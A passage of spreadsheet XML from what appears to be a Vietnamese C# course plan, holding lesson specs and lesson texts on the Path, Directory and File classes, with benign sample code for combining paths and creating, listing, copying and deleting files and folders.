- Chuyển sang tab **Ghép đường dẫn**. Phép cộng `"Data" + "Reports"` cho `DataReports`, ô kết quả chuyển đỏ vì hai tên dính liền. `Path.Combine("Data", "Reports", "a.txt")` cho `Data\Reports\a.txt`, mỗi phần có dấu `\` ngăn cách. Bước cuối là `Path.Combine("Data", @"C:\Temp")`: chip `"C:\Temp"` sáng lên, chip `"Data"` bị bỏ và kết quả chỉ còn `C:\Temp`.
- Mở tab **Đổi phần mở rộng**. Chuỗi `bao-cao.txt` gồm tên `bao-cao` và đuôi `.txt`. Sau `ChangeExtension(name, ".csv")`, chuỗi trở thành `bao-cao.csv`. Nhưng khung "Đĩa" vẫn hiện tệp thật tên `bao-cao.txt`, không đổi.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-path-thao-tac-voi-duong-dan-file/" title="Lớp Path và đường dẫn file" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Path` tách và ghép đường dẫn thay cho việc tự cắt chuỗi và tự tìm dấu phân cách. Hãy ghép bằng `Path.Combine`, không cộng chuỗi, và nhớ rằng `Path` chỉ tạo ra chuỗi, không động đến tệp thật.
## Lợi ích của Path so với xử lý chuỗi thủ công
- **Chạy được trên nhiều hệ điều hành:** `Path.Combine` tự dùng đúng dấu phân cách của nơi đang chạy (`\` trên Windows, `/` trên macOS và Linux).
- **Ít lỗi:** tránh thiếu hoặc thừa dấu phân cách, và tránh sai khi cắt chuỗi thủ công.
- **Dễ đọc, dễ bảo trì:** tên phương thức nói rõ mục đích, như `GetExtension` hay `GetFileName`.
## Tóm tắt
- `Path` là lớp tĩnh chỉ xử lý chuỗi đường dẫn, không thao tác với tệp thật.
- Tách đường dẫn bằng `GetDirectoryName`, `GetFileName`, `GetFileNameWithoutExtension` và `GetExtension`.
- Ghép đường dẫn bằng `Path.Combine`, không dùng phép cộng chuỗi.
- `Path.Combine` bỏ các phần đứng trước khi gặp một đường dẫn tuyệt đối.
- `Path.ChangeExtension` chỉ đổi chuỗi, không đổi tên tệp thật.</t>
        </is>
      </c>
    </row>
    <row r="41" ht="409.6" customHeight="1" s="18">
      <c r="A41" s="10" t="n">
        <v>41</v>
      </c>
      <c r="B41" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C41" s="10" t="inlineStr">
        <is>
          <t>Quản lý Đường dẫn và Thư mục</t>
        </is>
      </c>
      <c r="D41" s="10" t="inlineStr">
        <is>
          <t>Lớp Directory: Quản lý thư mục</t>
        </is>
      </c>
      <c r="E41" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F41" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G41" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H41" s="10" t="inlineStr">
        <is>
          <t>Thấy các thao tác thư mục tác động lên cây thư mục ra sao.</t>
        </is>
      </c>
      <c r="I41" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J41" s="10" t="inlineStr">
        <is>
          <t>Cây thư mục có biểu tượng thư mục/tệp và thụt lề; nút mới tô xanh, nút bị xóa mờ đỏ, nút được liệt kê viền vàng; vị trí lỗi gắn dấu chấm than.</t>
        </is>
      </c>
      <c r="K41" s="10" t="inlineStr">
        <is>
          <t>H15, H03</t>
        </is>
      </c>
      <c r="L41" s="10" t="inlineStr">
        <is>
          <t>CreateDirectory | GetFiles | Delete | Exists</t>
        </is>
      </c>
      <c r="M41" s="10" t="inlineStr">
        <is>
          <t>CreateDirectory(@"Data\2024\Thang10") → tạo cả các cấp còn thiếu; gọi lại khi đã có → không lỗi.
GetFiles("Data", "*.txt") → chỉ tệp .txt ở cấp Data; thêm SearchOption.AllDirectories → cả thư mục con.
Delete("Data") khi bên trong còn nội dung → IOException; Delete("Data", true) → xóa cả cây.
Exists("Data") trước và sau khi xóa: true → false.
Bước cuối mỗi tab: trạng thái cây.</t>
        </is>
      </c>
      <c r="N41" s="10" t="inlineStr">
        <is>
          <t>Cây: Data/{a.txt, b.csv, 2024/{c.txt}}</t>
        </is>
      </c>
      <c r="O41" s="10" t="inlineStr">
        <is>
          <t>Directory làm việc với thư mục; xóa thư mục không rỗng cần recursive: true.</t>
        </is>
      </c>
      <c r="P41" s="10" t="inlineStr">
        <is>
          <t>Thông điệp lỗi cụ thể khác nhau theo hệ điều hành; mô phỏng ghi tên loại exception.</t>
        </is>
      </c>
      <c r="Q41" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-directory-quan-ly-thu-muc/index.html</t>
        </is>
      </c>
      <c r="R41" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-directory-quan-ly-thu-muc/</t>
        </is>
      </c>
      <c r="S41" s="10" t="n"/>
      <c r="T41" s="12" t="n"/>
      <c r="U41" s="12" t="n"/>
      <c r="V41" s="21" t="inlineStr">
        <is>
          <t>Lớp Directory: Quản lý thư mục
Trong bài học trước, chúng ta đã tìm hiểu về lớp Path và cách nó giúp thao tác với các chuỗi đường dẫn một cách an toàn và hiệu quả. Giờ đây, chúng ta sẽ khám phá một lớp quan trọng khác trong không gian tên System.IO là Directory. Lớp Directory cung cấp các phương thức tĩnh để thực hiện các thao tác quản lý thư mục như tạo, xóa, kiểm tra sự tồn tại, và liệt kê nội dung của thư mục.
Giới thiệu về Lớp Directory
Lớp System.IO.Directory là một tập hợp các phương thức tĩnh, có nghĩa là bạn không cần tạo một đối tượng của lớp này. Thay vào đó, bạn gọi trực tiếp các phương thức trên chính tên lớp Directory (ví dụ: Directory.CreateDirectory(...)).
Mục đích chính của Directory là quản lý cấu trúc thư mục trên hệ thống file. Nó cho phép ứng dụng của bạn tạo ra các thư mục để tổ chức dữ liệu, dọn dẹp các thư mục không còn cần thiết, hoặc duyệt qua cấu trúc thư mục để tìm kiếm thông tin.
Để sử dụng lớp Directory, bạn cần đảm bảo đã thêm câu lệnh using System.IO; vào đầu file mã nguồn của mình.
Tạo Thư mục Mới với CreateDirectory()
Phương thức CreateDirectory() cho phép bạn tạo một thư mục mới tại một đường dẫn được chỉ định. Một điểm tiện lợi của phương thức này là nếu thư mục đã tồn tại, nó sẽ không làm gì cả và không gây ra lỗi.
using System;
using System.IO;
public class DirectoryManager
{
    public static void Main(string[] args)
    {
        string newDirPath = "DuLieuUngDung";
        try
        {
            Directory.CreateDirectory(newDirPath);
            Console.WriteLine($"Thư mục '{newDirPath}' đã được tạo hoặc đã tồn tại.");
            // Tạo thư mục con. Tham khảo lớp Path để tạo đường dẫn an toàn.
            string subDirPath = Path.Combine(newDirPath, "BaoCao");
            Directory.CreateDirectory(subDirPath);
            Console.WriteLine($"Thư mục con '{subDirPath}' đã được tạo hoặc đã tồn tại.");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi khi tạo thư mục: {ex.Message}");
        }
    }
}
Xóa Thư mục với Delete()
Phương thức Delete() được sử dụng để xóa một thư mục. Có hai phiên bản chính:
Directory.Delete(string path): Xóa một thư mục RỖNG. Nếu thư mục không rỗng, nó sẽ ném ra một IOException.
Directory.Delete(string path, bool recursive): Xóa một thư mục.
Nếu recursive là false, nó hoạt động giống như phiên bản đầu tiên.
Nếu recursive là true, nó sẽ xóa thư mục và tất cả các file cùng thư mục con bên trong nó. Hãy cực kỳ cẩn thận khi sử dụng tùy chọn này, vì nó sẽ xóa vĩnh viễn dữ liệu!
using System;
using System.IO;
public class DirectoryManager
{
    public static void Main(string[] args)
    {
        string targetDirPath = "ThuMucCanXoa";
        string nestedDirPath = Path.Combine(targetDirPath, "ThuMucCon");
        try
        {
            // Tạo cấu trúc mẫu
            Directory.CreateDirectory(nestedDirPath);
            File.WriteAllText(Path.Combine(nestedDirPath, "file.txt"), "Nội dung.");
            Console.WriteLine($"Đã tạo cấu trúc thư mục mẫu: {targetDirPath}\\{nestedDirPath}\\file.txt");
            // Thử xóa thư mục không rỗng mà không dùng recursive (sẽ lỗi)
            try
            {
                Directory.Delete(targetDirPath);
                Console.WriteLine($"Thư mục '{targetDirPath}' đã được xóa (không mong đợi).");
            }
            catch (IOException ex)
            {
                Console.WriteLine($"Lỗi khi xóa thư mục '{targetDirPath}' (mong đợi): {ex.Message}");
                Console.WriteLine("Thử xóa lại với recursive = true...");
            }
            // Xóa thư mục và tất cả nội dung bên trong
            Directory.Delete(targetDirPath, true);
            Console.WriteLine($"Thư mục '{targetDirPath}' và tất cả nội dung đã được xóa.");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi: {ex.Message}");
        }
    }
}
Kiểm tra Sự Tồn tại của Thư mục với Exists()
Trước khi thực hiện các thao tác file/thư mục, việc kiểm tra sự tồn tại là một thực hành tốt để tránh các ngoại lệ. Phương thức Exists() trả về true nếu thư mục tồn tại và false nếu không.
using System;
using System.IO;
public class DirectoryManager
{
    public static void Main(string[] args)
    {
        string checkDirPath = "ThuMucHienTai";
        string nonExistentDirPath = "ThuMucKhongTonTai";
        Directory.CreateDirectory(checkDirPath); // Đảm bảo thư mục tồn tại
        Console.WriteLine($"'{checkDirPath}' tồn tại? {Directory.Exists(checkDirPath)}");
        Console.WriteLine($"'{nonExistentDirPath}' tồn tại? {Directory.Exists(nonExistentDirPath)}");
        Directory.Delete(checkDirPath, true); // Dọn dẹp
    }
}
Liệt kê File và Thư mục Con
Lớp Directory cung cấp các phương thức để liệt kê nội dung của một thư mục.
Liệt kê File với GetFiles()
Phương thức GetFiles() trả về một mảng các chuỗi, mỗi chuỗi là đường dẫn đầy đủ đến một file. Các overload của phương thức này cho phép bạn lọc kết quả hoặc tìm kiếm đệ quy:
Directory.GetFiles(string path): Tất cả file trong path (chỉ cấp độ trên cùng).
Directory.GetFiles(string path, string searchPattern): Các file khớp với searchPattern (ví dụ: *.txt, image?.jpg).
Directory.GetFiles(string path, string searchPattern, SearchOption searchOption): Cho phép chỉ định SearchOption.AllDirectories để tìm kiếm trong tất cả các thư mục con.
using System;
using System.IO;
public class DirectoryManager
{
    public static void Main(string[] args)
    {
        string rootDir = "TaiLieu";
        string subDir = Path.Combine(rootDir, "BaoCaoNam");
        // Tạo cấu trúc mẫu
        Directory.CreateDirectory(subDir);
        File.WriteAllText(Path.Combine(rootDir, "gioithieu.txt"), "...");
        File.WriteAllText(Path.Combine(rootDir, "readme.md"), "...");
        File.WriteAllText(Path.Combine(subDir, "baocao2023.pdf"), "...");
        File.WriteAllText(Path.Combine(subDir, "baocao2024.docx"), "...");
        File.WriteAllText(Path.Combine(subDir, "temp.txt"), "...");
        Console.WriteLine($"\n--- File trong '{rootDir}' (cấp trên cùng):");
        foreach (string file in Directory.GetFiles(rootDir))
        {
            Console.WriteLine($"- {Path.GetFileName(file)}");
        }
        Console.WriteLine($"\n--- File *.txt trong '{rootDir}' (cấp trên cùng):");
        foreach (string file in Directory.GetFiles(rootDir, "*.txt"))
        {
            Console.WriteLine($"- {Path.GetFileName(file)}");
        }
        Console.WriteLine($"\n--- Tất cả file trong '{rootDir}' và thư mục con:");
        foreach (string file in Directory.GetFiles(rootDir, "*.*", SearchOption.AllDirectories))
        {
            Console.WriteLine($"- {file}");
        }
        Directory.Delete(rootDir, true); // Dọn dẹp
    }
}
Liệt kê Thư mục Con với GetDirectories()
Tương tự như GetFiles(), phương thức GetDirectories() trả về một mảng các chuỗi là đường dẫn đầy đủ đến các thư mục con. Nó cũng hỗ trợ searchPattern và SearchOption.
using System;
using System.IO;
public class DirectoryManager
{
    public static void Main(string[] args)
    {
        string rootDir = "DuAn";
        Directory.CreateDirectory(Path.Combine(rootDir, "Src"));
        Directory.CreateDirectory(Path.Combine(rootDir, "Dist"));
        Directory.CreateDirectory(Path.Combine(rootDir, "Docs"));
        Console.WriteLine($"\n--- Thư mục con trong '{rootDir}':");
        foreach (string dir in Directory.GetDirectories(rootDir))
        {
            Console.WriteLine($"- {Path.GetFileName(dir)}");
        }
        Directory.Delete(rootDir, true); // Dọn dẹp
    }
}
Kết luận
Lớp Directory là một công cụ mạnh mẽ và linh hoạt trong System.IO để quản lý các thư mục trên hệ thống file. Bằng cách sử dụng các phương thức tĩnh của nó như CreateDirectory(), Delete(), Exists(), GetFiles(), và GetDirectories(), bạn có thể dễ dàng tổ chức, truy cập và dọn dẹp cấu trúc thư mục trong ứng dụng C# của mình. Luôn nhớ xử lý các ngoại lệ tiềm ẩn bằng try-catch để đảm bảo ứng dụng của bạn hoạt động ổn định khi tương tác với hệ thống file.</t>
        </is>
      </c>
      <c r="W41" s="22" t="inlineStr">
        <is>
          <t># Lớp Directory: Quản lý thư mục
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích lớp `Directory` là gì và vì sao gọi các phương thức trực tiếp trên tên lớp.
- Viết lệnh tạo thư mục (nhiều cấp), kiểm tra sự tồn tại và xóa thư mục bằng `Directory`.
- Phân biệt `Directory.Delete(path)` với `Directory.Delete(path, true)`.
- Liệt kê tệp bằng `GetFiles()` với mẫu tìm kiếm và `SearchOption.AllDirectories`.
- Quan sát cây thư mục thay đổi từng bước bằng hoạt động mô phỏng.
## Giới thiệu lớp Directory
Lớp `System.IO.Directory` gom các thao tác quản lý **thư mục** (directory, folder) trên ổ đĩa: tạo, xóa, kiểm tra, liệt kê nội dung. Ở bài trước, lớp `Path` giúp bạn xử lý chuỗi đường dẫn. Lớp `Directory` thì tác động thật lên hệ thống tệp.
Mọi phương thức của `Directory` đều là **phương thức tĩnh** (static). Bạn không dùng `new`, mà gọi thẳng trên tên lớp, ví dụ `Directory.CreateDirectory(...)`. Hãy nhớ thêm `using System.IO;` ở đầu tệp.
| Phương thức | Việc làm |
|---|---|
| `CreateDirectory(path)` | Tạo thư mục, kể cả các cấp cha còn thiếu |
| `Exists(path)` | Cho biết thư mục có tồn tại không |
| `GetFiles(path, ...)` | Trả về mảng đường dẫn các tệp |
| `GetDirectories(path, ...)` | Trả về mảng đường dẫn các thư mục con |
| `Delete(path)` / `Delete(path, true)` | Xóa thư mục |
## Tạo thư mục với CreateDirectory()
`CreateDirectory()` tạo thư mục tại đường dẫn bạn đưa vào. Nó có hai điểm tiện lợi:
- Nếu đường dẫn có nhiều cấp, nó tạo **mọi cấp còn thiếu** chỉ trong một lệnh.
- Nếu thư mục đã có, nó **không làm gì và không ném lỗi**.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        string path = Path.Combine("Data", "2024", "Thang10");
        Directory.CreateDirectory(path);   // tạo Data, Data/2024, Data/2024/Thang10
        Directory.CreateDirectory(path);   // đã có: không làm gì, không lỗi
        Console.WriteLine(Directory.Exists(path));   // True
    }
}
```
## Kiểm tra với Exists()
`Directory.Exists(path)` trả về `true` nếu thư mục có thật và `false` nếu không. Phương thức này **không bao giờ ném lỗi** khi thư mục vắng mặt, nên rất an toàn để hỏi trước khi làm việc.
```csharp
Console.WriteLine(Directory.Exists("Data"));        // True nếu Data đang có
Console.WriteLine(Directory.Exists("KhongCoDau"));  // False
```
## Liệt kê tệp với GetFiles()
`GetFiles()` trả về **mảng chuỗi**, mỗi chuỗi là đường dẫn của một tệp. Có ba cách gọi:
- `GetFiles(path)`: mọi tệp ở cấp `path`.
- `GetFiles(path, searchPattern)`: chỉ tệp khớp mẫu, ví dụ `"*.txt"`.
- `GetFiles(path, searchPattern, SearchOption.AllDirectories)`: tìm cả trong mọi thư mục con.
Mặc định `GetFiles()` chỉ xét **một cấp**. Muốn đi sâu vào thư mục con, bạn phải thêm `SearchOption.AllDirectories`.
Giả sử `Data` có `a.txt`, `b.csv` và thư mục con `2024` chứa `c.txt`:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        Directory.CreateDirectory(Path.Combine("Data", "2024"));
        File.WriteAllText(Path.Combine("Data", "a.txt"), "A");
        File.WriteAllText(Path.Combine("Data", "b.csv"), "B");
        File.WriteAllText(Path.Combine("Data", "2024", "c.txt"), "C");
        string[] a = Directory.GetFiles("Data", "*.txt");
        // 1 tệp: Data/a.txt (trên Windows là Data\a.txt)
        string[] b = Directory.GetFiles("Data", "*.txt", SearchOption.AllDirectories);
        // 2 tệp: Data/a.txt và Data/2024/c.txt
        Console.WriteLine(a.Length);   // 1
        Console.WriteLine(b.Length);   // 2
    }
}
```
`b.csv` không khớp mẫu `*.txt` nên lần nào cũng bị bỏ qua. Phương thức `GetDirectories()` hoạt động tương tự, nhưng trả về đường dẫn các thư mục con. Dùng `Path.GetFileName(...)` nếu bạn chỉ muốn in tên.
## Xóa thư mục với Delete()
`Delete()` có hai dạng:
| Cách gọi | Hành vi |
|---|---|
| `Directory.Delete(path)` | Chỉ xóa thư mục **rỗng**. Nếu còn nội dung, ném `IOException` |
| `Directory.Delete(path, true)` | Xóa thư mục cùng **mọi tệp và thư mục con** bên trong (`recursive`) |
```csharp
try
{
    Directory.Delete("Data");   // Data còn nội dung, ném IOException
}
catch (IOException)
{
    Console.WriteLine("Data còn nội dung");
}
Directory.Delete("Data", true);   // xóa cả cây Data
```
**Lưu ý:** `recursive: true` xóa **vĩnh viễn**, không đưa vào Thùng rác. Hãy kiểm tra kỹ đường dẫn trước khi gọi.
## Hoạt động: Cây thư mục thay đổi thế nào
Mô phỏng dưới đây vẽ cây thư mục và cập nhật nó sau mỗi lệnh. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **CreateDirectory**. Thư mục chạy ban đầu trống. Lệnh `Directory.CreateDirectory(@"Data\2024\Thang10")` tạo một lúc ba cấp `Data`, `2024`, `Thang10`, các ô mới hiện màu xanh. Lệnh được gọi lần hai với cùng đường dẫn: cây giữ nguyên và một thẻ "Không có lỗi" xuất hiện.
- Mở tab **GetFiles**. Cây có `a.txt`, `b.csv` và thư mục con `2024` chứa `c.txt`. Với `GetFiles("Data", "*.txt")`, chỉ `a.txt` được tô sáng, mảng `a` có 1 phần tử. Khi thêm `SearchOption.AllDirectories`, mảng `b` có 2 phần tử vì `c.txt` trong `2024` cũng được tìm thấy. `b.csv` luôn bị làm mờ.
- Mở tab **Delete**. `Directory.Delete("Data")` làm `Data` đỏ lên cùng thẻ `IOException`, cây vẫn nguyên, và `catch` in "Data còn nội dung". Sau đó `Directory.Delete("Data", true)` đánh dấu xóa toàn bộ `Data`, `a.txt`, `b.csv`, `2024`, `c.txt`, chỉ còn thư mục chạy.
- Mở tab **Exists**. Lần gọi đầu in `True` vì `Data` đang có. Sau khi xóa cả cây, lần gọi thứ hai in `False` và không có lỗi nào.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-directory-quan-ly-thu-muc/" title="Lớp Directory" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `CreateDirectory` tạo đủ các cấp và gọi lại không gây lỗi. `GetFiles` chỉ xét một cấp trừ khi có `AllDirectories`. `Delete` thường chỉ xóa thư mục rỗng, còn `recursive: true` xóa cả cây, nên phải dùng thận trọng.
## Lưu ý khi làm việc với thư mục
- Thao tác với hệ thống tệp có thể lỗi (không đủ quyền, đường dẫn sai, thư mục đang bị dùng). Hãy bọc bằng `try-catch` khi cần.
- Nên dùng `Path.Combine` để ghép đường dẫn, tránh tự gõ dấu `\` hay `/`.
- Với dữ liệu quan trọng, hãy kiểm tra lại đường dẫn trước khi `Delete(path, true)`.
## Tóm tắt
- `Directory` là lớp tĩnh trong `System.IO` để quản lý thư mục.
- `CreateDirectory()` tạo mọi cấp còn thiếu và không lỗi nếu thư mục đã có.
- `Exists()` trả về `true` hoặc `false`, không ném lỗi.
- `GetFiles()` chỉ xét một cấp. Thêm `SearchOption.AllDirectories` để tìm cả thư mục con.
- `Delete(path)` chỉ xóa thư mục rỗng. `Delete(path, true)` xóa cả nội dung bên trong, vĩnh viễn.</t>
        </is>
      </c>
    </row>
    <row r="42" ht="409.6" customHeight="1" s="18">
      <c r="A42" s="10" t="n">
        <v>42</v>
      </c>
      <c r="B42" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C42" s="10" t="inlineStr">
        <is>
          <t>Quản lý Đường dẫn và Thư mục</t>
        </is>
      </c>
      <c r="D42" s="10" t="inlineStr">
        <is>
          <t>Các phương thức hữu ích của lớp File</t>
        </is>
      </c>
      <c r="E42" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F42" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G42" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H42" s="10" t="inlineStr">
        <is>
          <t>Nắm nhanh Exists, Copy, Move, Delete và cách chúng phản ứng khi tệp đích đã có hoặc tệp không tồn tại.</t>
        </is>
      </c>
      <c r="I42" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J42" s="10" t="inlineStr">
        <is>
          <t>Cây thư mục nhỏ; thao tác Copy/Move có mũi tên cong từ nguồn tới đích; lỗi gắn thẻ đỏ.</t>
        </is>
      </c>
      <c r="K42" s="10" t="inlineStr">
        <is>
          <t>H15, H03</t>
        </is>
      </c>
      <c r="L42" s="10" t="inlineStr">
        <is>
          <t>Exists | Copy | Move | Delete</t>
        </is>
      </c>
      <c r="M42" s="10" t="inlineStr">
        <is>
          <t>Exists("a.txt") → true; Exists("z.txt") → false.
Copy("a.txt", "b.txt") khi b.txt đã có → IOException; Copy(..., overwrite: true) → ghi đè.
Move("a.txt", @"Backup\a.txt") → tệp chuyển chỗ (cũng dùng để đổi tên).
Delete("z.txt") khi tệp không tồn tại → không lỗi; Delete(@"KhongCo\z.txt") khi thư mục không có → DirectoryNotFoundException.
Bước cuối mỗi tab: trạng thái cây.</t>
        </is>
      </c>
      <c r="N42" s="10" t="inlineStr">
        <is>
          <t>Cây: a.txt, b.txt, Backup/</t>
        </is>
      </c>
      <c r="O42" s="10" t="inlineStr">
        <is>
          <t>Biết trước phương thức nào ném lỗi giúp chọn chỗ đặt try-catch hoặc kiểm tra trước.</t>
        </is>
      </c>
      <c r="P42" s="10" t="n"/>
      <c r="Q42" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/cac-phuong-thuc-huu-ich-cua-lop-file/index.html</t>
        </is>
      </c>
      <c r="R42" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/cac-phuong-thuc-huu-ich-cua-lop-file/</t>
        </is>
      </c>
      <c r="S42" s="10" t="n"/>
      <c r="T42" s="12" t="n"/>
      <c r="U42" s="12" t="n"/>
      <c r="V42" s="21" t="inlineStr">
        <is>
          <t>Khám phá sức mạnh của lớp File
Nếu lớp Path giúp bạn "nói chuyện" với các chuỗi đường dẫn và Directory giúp bạn "quản lý" cấu trúc thư mục, thì lớp File chính là "bàn tay" trực tiếp can thiệp vào nội dung và trạng thái của các tệp tin trên ổ cứng. Nằm trong không gian tên System.IO, lớp File cung cấp một tập hợp các phương thức tĩnh mạnh mẽ để thực hiện các thao tác cấp cao như sao chép, di chuyển, xóa hoặc kiểm tra thông tin file một cách nhanh chóng.
Kiểm tra sự tồn tại và thông tin File
Trước khi thực hiện bất kỳ thao tác đọc hoặc ghi nào, bước quan trọng nhất chính là kiểm tra xem file đó có tồn tại hay không. Việc cố gắng mở một file không tồn tại sẽ dẫn đến các ngoại lệ FileNotFoundException khó kiểm soát.
Phương thức File.Exists(string path) là người bạn đồng hành tin cậy của mọi lập trình viên. Ngoài ra, bạn có thể kiểm tra thuộc tính hoặc thời gian tạo file thông qua File.GetAttributes hoặc File.GetCreationTime.
string filePath = "data.txt";
if (File.Exists(filePath))
{
    Console.WriteLine("File đã tồn tại.");
    DateTime creationTime = File.GetCreationTime(filePath);
    Console.WriteLine($"Được tạo lúc: {creationTime}");
}
else
{
    Console.WriteLine("File không tồn tại, cần khởi tạo trước.");
}
Các thao tác quản lý File cấp cao
Lớp File đơn giản hóa việc quản lý vòng đời của một tệp tin thông qua các phương thức tĩnh. Thay vì phải xử lý các luồng (stream) phức tạp, bạn có thể sử dụng các lệnh trực tiếp cho những tác vụ cơ bản:
File.Copy(source, dest): Sao chép file từ vị trí này sang vị trí khác. Bạn có thể thêm tham số overwrite: true để ghi đè lên file đích nếu nó đã tồn tại.
File.Move(source, dest): Di chuyển file hoặc đổi tên file (di chuyển trong cùng một thư mục).
File.Delete(path): Xóa vĩnh viễn tệp tin. Hãy cẩn thận, vì phương thức này không đưa file vào Thùng rác (Recycle Bin) của hệ thống.
Lưu ý quan trọng: Các phương thức này sẽ ném ra ngoại lệ nếu tệp tin đang được sử dụng bởi một tiến trình khác hoặc nếu ứng dụng của bạn không có quyền truy cập (permission) vào vị trí đó. Hãy luôn bao bọc chúng trong khối try-catch.
Ghi và đọc dữ liệu nhanh chóng
Đối với các file văn bản có kích thước nhỏ hoặc vừa phải, bạn không nhất thiết phải mở các luồng đọc/ghi (StreamReader/StreamWriter) theo cách truyền thống. Lớp File cung cấp các phương thức "All-in-one" cực kỳ tiện lợi:
File.WriteAllText: Ghi toàn bộ chuỗi nội dung vào một file. Nếu file đã tồn tại, nó sẽ bị ghi đè hoàn toàn.
File.AppendAllText: Thêm nội dung vào cuối file hiện có mà không làm mất dữ liệu cũ.
File.ReadAllText: Đọc toàn bộ nội dung file thành một chuỗi duy nhất.
File.ReadAllLines: Đọc toàn bộ nội dung và trả về một mảng các chuỗi, mỗi phần tử tương ứng với một dòng.
string path = "log.txt";
// Ghi dữ liệu
File.WriteAllText(path, "Bắt đầu ghi nhật ký ứng dụng.\n");
File.AppendAllText(path, "Dòng thứ hai: Hệ thống hoạt động bình thường.");
// Đọc dữ liệu
string content = File.ReadAllText(path);
Console.WriteLine(content);
Những cạm bẫy cần tránh
Mặc dù lớp File rất thuận tiện, nhưng nó có những giới hạn về mặt hiệu năng đối với các file có kích thước rất lớn.
Sử dụng bộ nhớ (Memory Consumption): Các phương thức ReadAll... và WriteAll... sẽ nạp toàn bộ nội dung file vào RAM. Nếu bạn đọc một file log nặng vài GB, ứng dụng của bạn có khả năng cao sẽ gặp lỗi OutOfMemoryException.
Khóa file (File Locking): Sau khi thực hiện các phương thức này, hệ thống sẽ tự động đóng file. Tuy nhiên, nếu bạn thực hiện thao tác trên một file đang được mở bởi chương trình khác (ví dụ như Excel hoặc một phần mềm đang chạy), bạn sẽ gặp lỗi IOException: The process cannot access the file.
Xử lý lỗi: Luôn kiểm tra quyền truy cập thư mục trước khi thực hiện các thao tác ghi. Việc quản lý lỗi tập trung sẽ giúp ứng dụng của bạn trở nên chuyên nghiệp và bền bỉ hơn trong môi trường thực tế.
Bằng cách tận dụng các phương thức có sẵn trong lớp File, bạn đã tiết kiệm được đáng kể thời gian viết mã nguồn cho các thao tác quản lý tệp tin cơ bản, từ đó tập trung tốt hơn vào các logic nghiệp vụ phức tạp hơn trong ứng dụng C# của mình.</t>
        </is>
      </c>
      <c r="W42" s="22" t="inlineStr">
        <is>
          <t># Các phương thức hữu ích của lớp File
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Dùng `File.Exists` để kiểm tra một tệp có tồn tại hay không.
- Sao chép tệp bằng `File.Copy` và giải thích vì sao tệp đích đã có thì phải truyền `overwrite: true`.
- Chuyển hoặc đổi tên tệp bằng `File.Move`.
- Phân biệt khi nào `File.Delete` im lặng bỏ qua và khi nào nó ném `DirectoryNotFoundException`.
- Quan sát bốn phương thức tác động lên cây thư mục bằng hoạt động mô phỏng.
## Lớp File trong System.IO
Nếu `Path` xử lý chuỗi đường dẫn và `Directory` quản lý thư mục, thì lớp `System.IO.File` thao tác trực tiếp với **tệp** (file). Giống hai lớp kia, mọi phương thức của `File` đều là **phương thức tĩnh**: bạn gọi thẳng `File.Copy(...)`, không cần `new`. Nhớ thêm `using System.IO;`.
Bài này tập trung vào bốn phương thức quản lý vòng đời của một tệp:
| Phương thức | Việc làm |
|---|---|
| `File.Exists(path)` | Kiểm tra tệp có tồn tại không |
| `File.Copy(src, dest)` | Sao chép tệp |
| `File.Move(src, dest)` | Chuyển tệp hoặc đổi tên tệp |
| `File.Delete(path)` | Xóa tệp |
## Exists: tệp có tồn tại không
`File.Exists(path)` trả về `true` nếu tệp có thật và `false` nếu không. Nó **không ném lỗi** và **không thay đổi** tệp nào.
```csharp
Console.WriteLine(File.Exists("a.txt"));   // True nếu có a.txt
Console.WriteLine(File.Exists("z.txt"));   // False nếu không có z.txt
```
Lưu ý: `Exists` cũng trả về `false` khi `path` trỏ tới một thư mục. Muốn kiểm tra thư mục, hãy dùng `Directory.Exists`.
## Copy: sao chép tệp
`File.Copy(nguon, dich)` chép nội dung tệp nguồn sang tệp đích. Nếu tệp đích **đã tồn tại**, mặc định `Copy` không dám ghi đè và ném `IOException`. Muốn ghi đè, truyền `overwrite: true`.
```csharp
try
{
    File.Copy("a.txt", "b.txt");            // b.txt đã có nên ném IOException
}
catch (IOException)
{
    Console.WriteLine("b.txt đã có");
}
File.Copy("a.txt", "b.txt", overwrite: true);   // b.txt mang nội dung của a.txt
```
